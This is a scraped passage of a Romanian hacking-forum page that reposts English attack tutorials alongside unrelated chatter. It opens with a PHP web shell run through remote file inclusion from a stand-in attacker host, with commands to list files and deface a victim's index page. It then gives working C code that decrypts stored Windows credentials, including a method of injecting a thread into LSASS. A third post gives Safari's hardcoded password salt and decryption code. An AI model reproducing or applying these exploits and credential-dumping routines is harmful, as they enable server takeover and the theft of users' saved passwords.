handy. Here we go <?php echo "<script>alert(U 4r3 0wn3d !!);</script>"; echo "Run command: ".htmlspecialchars($_GET['cmd']); system($_GET['cmd']); ?> The above code allows you to exploit include function and tests if the site if RFI (XSS) vulnerable by running the alert box code and if successful, you can send custom commands to the linux server in bash. So, if you are in luck and if it worked, lets try our hands on some Linux commands. For example to find the current working directory of server and then to list files, we will be using 'pwd' and 'ls' command http//victimsite.com/index.php?cmd=pwd&page=http://hackersite.com/ourscript http//victimsite.com/index.php?cmd=ls&page=http://hackersite.com/ourscript What it does is that it sends the command as cmd we put in our script and begins print the working directory and list the documents.Even better you can almost make the page proclaim that you hacked it by using the 'echo' command. cmd=echo U r pwn3d by xero> index.php It will then re-write the index.php and render it.In case, its a primitive website which stores pages with .txt extension, you might want to put it with along the .txt files. Now as expected, we are now the alpha and the omega of the website we can download, remove, rename, anything! Want to download stuff ? try the 'wget' function... I leave the rest to your creativity ! Conclusion In this basic tutorial, Rishabh explains about RFI vulnerability and how to play around with it. Edit: Cautasem de mult un tutorial, am gasit, il impart cu voi.
-
About Network Password & Credential Store Windows provides 'Credential Store' framework to store the network based passwords in a secure encrypted format. This provides convenient and reliable mechanism to store the passwords for network logins so that user don't have to enter the password every time while accessing the network resources. Not only Windows uses it to store network authentication passwords, but also other applications such as Outlook, Windows Live Messenger, Remote Destktop, GMail Notifier etc uses the same mechanism for storing their login passwords. Windows also allows applications to seamlessly manage this 'Credential Store' using Credential Management API functions such as CredEnumerate, CredRead, CredWrite, CredProtect, CredUnprotect, CredDelete etc. Location of Credential Store Windows 'Credential Store' keeps the user credentials in the encrypted format at user specific locations. The storage mechanism is slightly different for XP and Vista/Win7 platforms. For Windows XP On Windows XP, the encrypted user credentials are stored in the hidden file called 'Credentials' inside both APPDATA and LOCALAPPDATA locations mentioned below. APPDATA Location - C:\Documents and Settings\<username>\Application Data\Microsoft\Credentials\<user sid>\ LOCALAPPDATA Location - C:\Documents and Settings\<username>\Local Settings\Application Data\Microsoft\Credentials\<user sid>\ For Vista & Windows 7 Vista onwards, the user credentials are stored in the multiple files with random name (generated using GUID) inside both APPDATA and LOCALAPPDATA locations mentioned below. (There will be separate credential file for each of the network accounts) APPDATA Location - C:\Users\<username>\AppData\Roaming\Microsoft\Credentials\ LOCALAPPDATA Location - C:\Users\<username>\AppData\Local\Microsoft\Credentials\ Based on type of password and application, one of these locations are chosen to store the corresponding credential file. For example, Windows Live Messenger & Remote Desktop login passwords are stored at LOCALAPPDATA location and all other type of passwords are stored at APPDATA location. These credential files are hidden and not visible even if you have enabled 'show hidden files/folders' in the folder settings. To view these files, use the command prompt and navigate to the above locations and then issue the 'dir /a' command. Each of these credential file begins with standard signature at the beginning of the file which can used for its verification. Here are the first 16 bytes representing the identity of such credential file. 0x01, 0x00, 0x00, 0x00, 0xD0, 0x8C, 0x9D, 0xDF, 0x01, 0x15, 0xD1, 0x11, 0x8C, 0x7A, 0x00, 0xC0 Types of Network Passwords Windows 'Credential Store' supports different type of network passwords. Each type uses different kind of encryption and storage mechanism. Also each type of password requires different level of access privileges for decryption. Here are the primary types.... Generic Password Domain Password Domain Visible Password / .NET Passport Certificates 'Domain Password' type provides highest level of security as these passwords can only be managed by a specific system process called LSASS.exe. No other process, even though it is running as administrator can decrypt such passwords. All network authenticaiton, Remote Desktop and Outlook exchange server login passwords belongs to this type. 'Generic Password' type is used to store all user specific credentials and only that user can decrypt such passwords. Internet Explorer (basic & digest authentication) and Windows Live Messenger uses this method to store their login credentials. 'Domain Visible Password' is similar to 'Generic Password' mechanism. However in case of 'Generic Password' both username & password are encrypted and for 'Domain Visible Password' only password is encrypted. Also both types use different salt as entropy for decryption of the password. MSN messenger 7.0 uses this method to store the login passwords with the name as '.Net Passport' Recovering 'Generic Network' Passwords Generic network passwords are user specific and can be decrypted only in the security context of corresponding user. As mentioned earlier Windows Credential Management Authentication Functions (Windows) functions can be used to manage these passwords. Here is the sample code which demonstrates listing all the generic passwords and then decrypting them using CryptUnprotectData CryptUnprotectData Function (Windows) function. void EnumerateGenericNetworkPassword() { DATA_BLOB DataIn; DATA_BLOB DataOut; DATA_BLOB OptionalEntropy; tmpSalt[37]; char *strSalt={"abe2869f-9b47-4cd9-a358-c22904dba7f7"}; char strURL[1024]; char strCredentials[1024]; char strUsername[1024]; char strPassword[1024]; //Create the entropy/salt required for decryption... for(int i=0; i< 37; i++) tmpSalt[i] = (short int)(strSalt[i] * 4); OptionalEntropy.pbData = (BYTE *)&tmpSalt; OptionalEntropy.cbData = 74; DWORD Count; PCREDENTIAL *Credential; //Now enumerate all http stored credentials.... if(CredEnumerate(NULL,0,&Count,&Credential)) { for(int i=0;i<Count;i++) { if( Credential[i]->Type == CRED_TYPE_GENERIC) { DataIn.pbData = (BYTE *)Credential[i]->CredentialBlob; DataIn.cbData = Credential[i]->CredentialBlobSize; if(CryptUnprotectData(&DataIn, NULL, &OptionalEntropy, NULL, NULL,0,&DataOut)) { //Extract username & password from credentails (username:password) sprintf_s(strCredentials, 1024, "%S", DataOut.pbData); char *ptr = strchr(strCredentials, ':'); *ptr = '\0'; strcpy_s(strUsername, 1024, strCredentials); ptr++; strcpy_s(strPassword, 1024, ptr); printf("Generic Network Password account details, Username=%s, Password=%s", strUsername, strPassword); } } } // End of FOR loop CredFree(Credential); } } //End of function The above code uses the CredEnumerate function to go through all the stored network password accounts for current user. Next it checks if the account type is CRED_TYPE_GENERIC. If generic type of account is found then it decrypts the user credential data using the CryptUnprotectData function which is part of Windows Crypto API package. Upon successful decryption it contains both username and password in the clear text separated by semicolon. Recovering 'Domain Visible Network' (.Net Passport) Passwords This method uses the similar mechanism as the generic type to encrypt the password. Only difference is that here different salt is used to encrypt/decrypt the credentials. Also in this case only password is encrypted rather than both username & password pair as in case of generic method. Here is the modified working code for decrypting this type of network passwords void EnumerateDotNetPassportPassword() { DATA_BLOB DataIn; DATA_BLOB DataOut; DATA_BLOB OptionalEntropy; tmpSalt[37]; char *strSalt={"82BD0E67-9FEA-4748-8672-D5EFE5B779B0"}; char strCredentials[1024]; char strUsername[1024]; char strPassword[1024]; //Create the entropy/salt required for decryption... for(int i=0; i< 37; i++) tmpSalt[i] = (short int)(strSalt[i] * 4); OptionalEntropy.pbData = (BYTE *)&tmpSalt; OptionalEntropy.cbData = 74; DWORD Count; PCREDENTIAL *Credential; //Now enumerate all http stored credentials.... if(CredEnumerate(NULL,0,&Count,&Credential)) { for(int i=0;i<Count;i++) { if( Credential[i]->Type == CRED_TYPE_DOMAIN_VISIBLE_PASSWORD) { DataIn.pbData = (BYTE *)Credential[i]->CredentialBlob; DataIn.cbData = Credential[i]->CredentialBlobSize; sprintf_s(strUsername, 1024, "%S", Credential[i]->UserName); if(CryptUnprotectData(&DataIn, NULL, &OptionalEntropy, NULL,NULL,0,&DataOut)) { //Decrypted data contains password in clear text sprintf_s(strPassword, 1024, "%S", DataOut.pbData); printf(".Net Passport Account details, Username=%s, Password=%s", strUsername, strPassword); } } } // End of FOR loop CredFree(Credential); } } //End of function The above code uses the CredEnumerate function to go through all the stored network password accounts for current user. Next it checks if the account type is CRED_TYPE_DOMAIN_VISIBLE_PASSWORD. If such an account is found then it decrypts the password data using the CryptUnprotectData function. Upon successful decryption it contains the password in clear text. This method is also termed as '.Net Passport' because it is mainly used by MSN Messenger which stored its login password with the name as '.Net Passport'. Recovering 'Domain Network' Passwords Domain network password method uses more stricter technique for encrypting the credentials thus providing better security over other methods. Only system process, LSASS.EXE can encrypt or decrypt these kind of passwords. LSASS is a Windows core system process responsible for enforcing the security and executing various security oriented tasks. So in order to decrypt domain passwords one has to perform decryption in the context of LSASS process. This can be achieved by injecting remote thread into LSASS process using CreateRemoteThread function. This is similar to the technique used by pwdump tool to dump the LM/NTLM hashes for the user accounts on the system. Once the thread is injected, it can use the special undocumented function LsaICryptUnprotectData exported from Lsasrv.dll to decrypt the credentials buffer. Here is the prototype of the function LsaICryptUnprotectData. typedef int (WINAPI *LPFUN_LSAICRYPTUNPROTECTDATA) ( LPBYTE encCredData, DWORD encCredDataSize, DWORD reserved1, DWORD reserved2, DWORD reserved3, DWORD reserved4, DWORD dwFlags, DWORD reserved5, LPBYTE *decCredData, LPDWORD decCredDataSize ); This function takes the credential buffer (credential file found in one of the store locations) & its size as input and returns the decrypted credential buffer. This decrypted buffer starts with the header whose structure is given below struct DecryptedDataHeader { DWORD dwHeaderId; //0x01 for XP & 0x30 for Vista/Win7 DWORD dwBufferSize; //size of the entire decrypted data }; Here first field contains the signature and second field indictes the size of entire decrypted buffer. After the header follows the network password structure for each of the stored accounts. This structure can represent any type of network password accounts and not just the domain password. However username & password is decrypted only for domain accounts and for all other types password is kept in the encrypted format. The contents of this structure is given below. The internal fields of the structure varies slightly for Vista/Win7 from XP. Hence care needs to be taken while decoding this decrypted data on XP and Vista/Win7 platforms. [ Note : All the structure information presented below is derived based on the reverse engineering work. So things may slightly differ from real stuff ] For xp: // For Windows XP struct DecryptedNetAccount { DWORD dwItemSize; //total size of this item for XP DWORD dwUnknown; DWORD dwType; DWORD dwFileTimeLowDate; DWORD dwFileTimeHighDate; DWORD dwZero; DWORD dwPersist; //3 => enterprise 2=> local machine char unknown[12]; DWORD dwCredNameSize; char strCredName[dwCredNameSize]; DWORD dwCommentSize; char strComment[dwCommentSize]; DWORD dwAliasSize; char strAlias[dwAliasSize]; DWORD dwUserNameSize; char strUserName[dwUserNameSize]; DWORD dwPasswordSize; char password[dwPasswordSize]; char padding[unknown]; //To make next entry aligned on 8th byte }; For Vista and Windows 7: // For Vista & Windows 7 struct DecryptedNetAccountVista { DWORD dwZero; DWORD dwType; DWORD dwzero; DWORD dwFileTimeLowDate; DWORD dwFileTimeHighDate; DWORD dwSomeSize; DWORD dwPersist; //3 => enterprise 2=> local machine char unknown[12]; DWORD dwCredNameSize; char strCredName[dwCredNameSize]; DWORD dwCommentSize; char strComment[dwCommentSize]; DWORD dwAliasSize; char strAlias[dwAliasSize]; DWORD dwUnknownSize; // only for vista/win7 char strUnknown[dwUnknownSize]; //only for vista/win7 DWORD dwUserNameSize; char strUserName[dwUserNameSize]; DWORD dwPasswordSize; char password[dwPasswordSize]; }; The above structure is of variable length and depends upon the length of the varoius text fields. Each of these text fields are NULL terminated UNICODE strings except the password field. Also at the end of each structure, extra padding (On windows XP only) bytes are added so as to align next entry on 8 byte boundary. On Vista/Windows 7 platform, only one network account is stored per credential file. Here is the sample code to decode this decrypted credential data and display the username/password information for all the stored domain password accounts. // Check for valid signature dwHeaderId = decDataBuffer->dwHeaderId if( dwHeaderId != 0x1 && dwHeaderId != 0x30 ) { printf("\n Decrypted data is not valid, mismatch in the header"); return; } //Set the index to first entry index = sizeof(DecryptedDataHeader); while( index < dwBufferSize ) { DecryptedDataItem *decDataItem = (DecryptedDataItem*) &pDecData[index]; if( decDataItem->index == CRED_TYPE_DOMAIN_PASSWORD ) { printf("\n Network Name = %S", decDataItem->strCredName); //move index to username field and print it printf("\n Username = %S ", decDataItem->strUserName); //next move to password field and print it out... WideCharToMultiByte(CP_ACP, 0, decDataItem->strPassword, decDataItem->dwPasswordSize, strPassword, 1000, NULL, NULL ); printf("\n Password = %s ", strPassword); } //move to next password entry for XP platform if( XP platform ) index = index + decDataItem->dwItemSize else break; //for vista/win7 only one account per credential file is stored } The above code first verifies if the decrypted data is valid by comparing the signature bytes in the header. Next it loops through each of the structure of domain password type and prints the network name, username & password in clear text. Also note that the decrypted buffer from LsaICryptUnprotectData contains data for all type of network passwords, not just the domain type. But the password for other types is still in the encrypted format which can be further decrypted using the same procedure as explained earlier for respective types. References: Three Ways to Inject Your Code into Another Process - CodeProject
-
tocmai am facut un thread asemanator dar la safari..acum ma apuc sa fac la firefox si ie. pana una alta uitete ce am postat:D http://rstcenter.com/forum/36234-%5Bexposed%5Dapple-safari-password-secrets.rst#post245677 Nu sunt eu autorul.
-
Introduction Safari is one of the top 5 browsers known for its innovative look and feel reflected in every product of Apple! It offers one of the best ways to read online, greater support for HTML5, and other new features that make the web even better. Like other browsers, Safari also comes with built-in password manager feature for securely storing and managing the user's web login passwords. This article is set to expose - in first ever public disclosure - password secrets of Safari including the stored password location, encryption algorithm and code for decryption of stored passwords ! Safari Password Storage Location Safari features good password manager with better security model and encryption algorithms to keep it as much as secure as possible. Unlike other browsers such as Firefox, Chrome, you cannot see the stored passwords in Safari. You can enable or disable the Safari password manager by toggling the option through "Settings -> AutoFill -> Usernames & Passwords" (as shown below). Once enabled Safari will prompt to save the password for every website login for the user. Upon confirmation, website URL along with username & password are saved to secret password file. Safari stores all such web login passwords at a secret file named 'keychain.plist' at following location (based on platform) [Windows XP] C:\Documents and Settings\<username>\Application Data\Apple Computer\Preferences [Windows Vista & Windows 7] C:\Users\<username>\AppData\Roaming\Apple Computer\Preferences Safari stores the contents of 'keychain.plist' in 'Binary Property List' file format - variation of Property List format used by Apple for storing binary data. Here is how typical 'keychain' file will look like, Decoding the Safari 'Keychain' Secrets ! Looking at above 'keychain file' content, there is hardly anything you can make out. Only hint that you get here is the 'bplist' keyword at the beginning of file. After long search hours on 'bplist' keyword, I finally figured out the way to decode its content to plain XML file. Apple provides the tool called 'plutil.exe' for playing with these 'Property List' files. You can find this console tool at following location [Windows x86] C:\Program Files\Common Files\Apple\Apple Application Support [Windows x64] C:\Program Files (x86)\Common Files\Apple\Apple Application Support Here is the command to covert cryptic 'keychain.plist' file to easily readable 'keychain.xml' file plutil.exe -convert xml1 -s -o c:\keychain.xml "c:\users\administrator\appdata\roaming\apple computer\preferences\keychain.plist" This is how it will look like after decoding to XML file Internals of Safari Encryption Algorithm The generated XML file (as shown above) contains encrypted password data along with website URL and username information. This stored password data is encoded using BASE64 algorithm. Note that original password data stored in 'keychain.plist' file is not encoded with BASE64. When we convert it to XML using Plutil tool, the encrypted password data is further encoded with BASE64 format. Once you decode the password using BASE64 you will see original encrypted password data. Safari uses standard 'Windows Data Protection' mechanism (DPAPI) to encrypt the password data with user isolation layer. Windows DPAPI provides functions like CryptProtectData/CryptUnprotectData for easy encryption/decryption of user oriented sensitive data such as passwords. Safari uses CryptProtectData along with static entropy (salt) to securely encrypt all website login passwords. Finally it is stored in the 'keychain.plist' file with other user login information. Decoding & Decryption of Safari Password As mentioned in previous section, successful password recovery will require following 2 steps 1. Base64 Decoding of password data from XML file 2. Windows DPAPI decryption of encrypted data First you have to use standard Base64 decoder algorithm to get original password data from encoded password bytes in XML file. After that we have to perform decryption of this encrypted password data. In order to decrypt this encrypted password data we need to figure out salt data used in CryptUnprotectData. Here is the salt data that I found during my reverse engineering work, Entire salt generation algorithm and decryption functions are within the Apple shared library 'CFNetwork.dll' which is present at following location, [Windows x86] C:\Program Files\Common Files\Apple\Apple Application Support [Windows x64] C:\Program Files (x86)\Common Files\Apple\Apple Application Support Here is the disassembly of CFNetwork.dll from IDA Pro showing the location of salt generation & decryption function Initially salt generation algorithm appeared to be dynamic but after few reversing session on different systems my doubts cleared and it was just static data. Salt data is of 144 byte size and ends with standard signature pattern as 'com.apple.Safari' as shown in the above screenshot. Once you get hold of the salt data, the encrypted password can easily be decrypted using CryptUnprotectData function as shown below BYTE salt[] = { 0x1D, 0xAC, 0xA8, 0xF8, 0xD3, 0xB8, 0x48, 0x3E, 0x48, 0x7D, 0x3E, 0x0A, 0x62, 0x07, 0xDD, 0x26, 0xE6, 0x67, 0x81, 0x03, 0xE7, 0xB2, 0x13, 0xA5, 0xB0, 0x79, 0xEE, 0x4F, 0x0F, 0x41, 0x15, 0xED, 0x7B, 0x14, 0x8C, 0xE5, 0x4B, 0x46, 0x0D, 0xC1, 0x8E, 0xFE, 0xD6, 0xE7, 0x27, 0x75, 0x06, 0x8B, 0x49, 0x00, 0xDC, 0x0F, 0x30, 0xA0, 0x9E, 0xFD, 0x09, 0x85, 0xF1, 0xC8, 0xAA, 0x75, 0xC1, 0x08, 0x05, 0x79, 0x01, 0xE2, 0x97, 0xD8, 0xAF, 0x80, 0x38, 0x60, 0x0B, 0x71, 0x0E, 0x68, 0x53, 0x77, 0x2F, 0x0F, 0x61, 0xF6, 0x1D, 0x8E, 0x8F, 0x5C, 0xB2, 0x3D, 0x21, 0x74, 0x40, 0x4B, 0xB5, 0x06, 0x6E, 0xAB, 0x7A, 0xBD, 0x8B, 0xA9, 0x7E, 0x32, 0x8F, 0x6E, 0x06, 0x24, 0xD9, 0x29, 0xA4, 0xA5, 0xBE, 0x26, 0x23, 0xFD, 0xEE, 0xF1, 0x4C, 0x0F, 0x74, 0x5E, 0x58, 0xFB, 0x91, 0x74, 0xEF, 0x91, 0x63, 0x6F, 0x6D, 0x2E, 0x61, 0x70, 0x70, 0x6C, 0x65, 0x2E, 0x53, 0x61, 0x66, 0x61, 0x72, 0x69 }; //now decrypt the data DATA_BLOB DataIn; DATA_BLOB DataOut; DATA_BLOB OptionalEntropy; DataIn.pbData = byteEncBuffer; //encrypted password data DataIn.cbData = dwEncBufferSize; //encrypted password data size OptionalEntropy.pbData = (unsigned char*)&salt; OptionalEntropy.cbData = 144; if(CryptUnprotectData(&DataIn, 0, &OptionalEntropy, NULL, NULL,0, &DataOut) == FALSE ) { printf("CryptUnprotectData failed = 0x%.8x", GetLastError()); return FALSE; } //Decrypted data is in following format //Password Length [4 bytes] + Pass Data [] BYTE *byteData = (BYTE *) DataOut.pbData; DWORD dwPassLen = byteData[0]; memcpy(strPassword, &byteData[4], dwPassLen); strPassword[dwPassLen] = 0; printf("Decrypted Password %d - %s", dwPassLen, strPassword); Above program initializes the salt data and then passes it to CryptUnprotectData along with decoded password data to finally get the decrypted data. First 4 bytes of this decrypted data contains length of the ascii password and then follows the password in clear text ! That is all it takes to successfully decrypt the Password from Safari store !
-
dar sa stii ideea nu e a individului care a facut codul asta:D
-
Un sfert din hackerii americani lucreaza pentru FBI
me.mello replied to Nytro's topic in Stiri securitate
Ahead are dreptate...majoritatea pidari. Off: Cuvantul "hacker" are alt inteles sau cel putin e inteles altfel in ziua de azi. Ai o vulnerabilitate gasita de unu, ai unealta de altu...sti sa le combini pe toate esti hacker...pff e o prostie acum 10 ani ziceai cu mandrie "omg i hacked that" cu manutele tale...putina deductie, mult skill si un pic de metotologie, acuma ce naiba sa mai zici. Numai zic nimic de crackeri...probabil si de aia s-au lasat de decriptat parole ca acum le-au luat astia care fac reverse engineering mau. Numai zic de asa zisii "ethical hackers" care peste 90% din uneltele pe care ti le ofera la ei in "lab" sunt facute de hackeri ori/sau la cererea lor ulterior facute publice. Sincer m-a bufnit rasu cand astia de la eccouncil bat cu pumnu in piept ca ei sunt primii care au scos C|EH 7 mai mult decat atat deviza lor face tot "Engineered by hackers, Presented by Professionals" , iar eu bat cu mandrie cu pumnul in piept ca pustanul ala care a fost recrutat de Ligatt care la 9 ani a spart o banca face susu pe C|EH 7. Numai zic de programa lor, mai ales tipurile noi de vulnerabilitati aparut odata cu platforma ARM si + multe altele....lipsesc. On: E cam ciudata treaba asta cum ca un sfert ar lucra pentru FBI, nu prea cred lucru asta, nici un adevarat "pro" nu s-ar gandi vreodata sa faca asa ceva, nu e profitabil, stau in anonimat si le merge foarte bine. Eu cred ca majoritatea din ei sunt ethical'i(va recomand sa urmariti un curs live...daca gasiti pe undeva, o sa vedeti ca vi se prezinta un tip de atac si unealta folosita gen nmap, ncat, acasa sau in lab iar tu trebuie sa exersezi parametrii si prostii, astea pentru un om care habar nu are ce e ala un network scanner sau mai degraba cu ce se mananca), sau genu de indivizi cum le plac americanilor sa le zica "ankle biters" care stiu sa faca ddos sau orice alt "cliseu" mai bine decat un agent FBI certificat:)) Zic asta pentru ca nu cred in "real deal" despre stirea asta. Luand in considerare ca SUA se lauta cu orice bit transferat catre sau din America trec pe la "baietii in alb" fac o treaba destul de proasta as zice eu,Anonimii nu ar mai fi anonimi, europenii nu ar mai avea ce sa fure de la americani fie media fie orice altceva, cu "hackerii" lor cu tot. Nu zic cu rautate, mi-am dat doar parerea...fie nu fac treaba buna hecarasii astia fie i-au recrutat sa-i tina la respect, mai degraba "cred" ca guvernul chinez platesc Hackeri pentru a ataca alte guverne. -
pune ma nytro si o poza cu tine:))
-
Bine ma Oust ti-a trecut banu;)) Ai revenit cu armament grav dupa cum observ.
-
vezi maestre, ca ai erori garla in program....incearca cu try, catch as...
-
da e tare faza, o stiu de vreo luna cand instalam chrome, Va recomand tuturor sa cititi, sunt niste lucruri chiar interesante:d
-
Si, eu o sa ajut cat pot...mai mult pe partea programming pentru moment, m-am uitat cam prin toate tutorialele, lipseste mult din ceea ce stiu eu si ar trebui sa stie toata lumea. Lucruri elementare, stranse din experienta proprie, altele din ce am prins din web + ce am combinat impreuna. RST nu are de ce sa cada,tinerilor din ziua de azi le-ar veni de 10 ori mai usor sa invete niste chestii,pe care noi cu greu am aflat de ele, ca si indomenii gen fizica,astronomie etc. Asta cred eu ca ar trebuie sa fie spirit de echipa, sa ajuti generatia urmatoare...din cate ati vazut, o generatie de hackeri* e ca o generatie de fotbal, se termina cam pe la 30 de ani, si cineva intodeauna trebuie sa fie pregatit sa preia sarcinile, chiar si cand cei "batrani" isi mai gasesc timp cu greu din alte preocupari legate de viata sociala si varsta.
-
haha Ma si astept la un atac din partea lui D. Evans asa ca din partea Iranului:))